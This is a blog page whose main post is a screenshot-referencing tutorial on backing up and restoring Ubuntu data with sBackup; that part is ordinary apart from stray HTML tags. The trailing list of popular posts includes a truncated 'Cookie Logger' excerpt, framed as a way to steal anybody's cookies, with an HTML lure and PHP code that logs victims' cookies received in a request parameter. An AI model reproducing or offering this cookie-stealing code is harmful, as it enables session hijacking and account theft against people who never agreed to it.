Skip to main content

Back Up Data in UBUNTU

                         ..::Backing Up::..

Be it Windows, Mac or Linux, it is always a wise choice to backup your data. You never know when your hardware is going to fail and when that happens, you know that all your data is safe and there is a backup copy for you to fall back on.

In Ubuntu, it is surprisingly easy to backup your data. Gone are the days that require you to remember all the text line commands to type in the command prompt. With sBackup, you can easily backup your data with few clicks of your mouse. let me show you how.

First, install sbackup
sudo apt-get install sbackup
Once done, go to System -> Administration -> Simple Backup Config. Enter your login password and you will be able to see the Window shown in the screen below.
sBackup screenshot1
Under the General tab, there are three ways you can choose to backup your data:
  1. Use recommended backup setting
  2. Use custom backup setting
  3. Manual backups only
If you are plain lazy and just to click, save and let it run by itself, you should choose the “recommended backup setting”. This will do a full backup every week and daily incremental backups to any changes made to the files. One point to note, this setting does not backup multimedia files and all file sizes that are more than 100MB.
For anyone who wants more control over which files to backup, the custom backup setting should be used. This setting allows you to define what should be included, excluded, the backup destination, when to backup and what to do with old backups.
Manual backup setting is for those who want to perform the backup manually.
Configuring backup setting
If you are choosing the custom backup or manual backup setting, here are your configuration choices:
The Include tab shows a list of directory that you want to backup. The two main directories you want to include are the /home and /etc. The /home contains all your personal data while the /etc contains all the application you have installed.
sBackup screenshot2
On the Exclude tab, you can do just the opposite, excluding the files that you don’t want to backup. You have more choices here. On the left, there are four tabs – pathsfile typesregex and max size. You can exclude all files from a path, all files of a certain files type, all files that match a certain expression or any files that are bigger than a certain size (the file size to be fixed by you). Some of the directories that you might want to exclude are /proc, /var/cache, /tmp, /dev, /var/tmp, /lost+found, /mnt, /media, /sys.
sBackup screenshot3
sBackup screenshot4
sBackup screenshot5
sBackup screenshot6
Next, we proceed on to the Destination tab. This is where you choose the location to backup your data to. The default backup directory is /var/backup. However, you can change it to other directory of your preference. You can also choose to backup to a remote directory via SSH or FTP.
sBackup screenshot7
The next option available to you is the Time setting. You set the time where the backup is executed. It can be hourly, daily, weekly, and monthly or if you prefer, set the precise day of the month, day of the week and even the hour and minute to backup your data. The last option in this setting is to set the minimum number of days before a full backup is required.
sBackup screenshot8
The last tab is the Purging. Select how you want to handle your old and incomplete backups. You can either choose to erase all backups older than your preset number of days, or use a logarithmic setting where one backup from the previous day, week, month and year are kept and the rest removed.
sBackup screenshot9</ol> </ul> <p>
Once you are done and satisfied with the configuration, press “Backup Now!” to start the backup. Depending on the setting you made, the process can take from few minutes to few hours.
Restoring the backups
It is very easy to restore the backup. Got to System -> Administration -> Simple Backup Restore. Enter your password and the window (shown in the screen below) will pop up.
sBackup screenshot10
Choose the backup directory where you backup your file and select the files or folders that you want to restore. To restore to the same location, press Restore. To restore to other location, press Restore As.
That’s it!

Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h

Assembly Language Step-by-step: Programming with DOS and Linux-

(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM

Cookie Logger

         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary